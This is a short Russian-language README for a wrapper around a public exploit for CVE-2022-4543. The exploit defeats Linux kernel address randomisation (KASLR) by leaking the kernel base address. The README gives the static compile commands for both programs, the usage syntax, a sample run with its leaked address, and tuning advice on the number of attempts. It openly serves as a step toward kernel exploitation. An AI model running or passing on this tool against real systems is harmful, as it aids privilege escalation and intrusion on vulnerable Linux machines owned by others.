
Обёртка для эксплуатации CVE-2022-4543, которая устраняет рандомизацию базового адреса ядра через обход KASLR, обеспечивая надёжную эксплуатацию ядра на уязвимых системах Linux.
Это обёртка эксплойта CVE-2022-4543 от willsroot, помогающая определить базовый адрес ядра.
По необходимости (опционально):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Для некоторых ОС сначала установите статическую libc.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
После запуска обеих программ вы получите наиболее часто встречающийся адрес на основе вашего смещения.
На практике реальный базовый адрес ядра будет появляться более чем в 1/4 всех попыток. Рекомендуется не менее 100 попыток.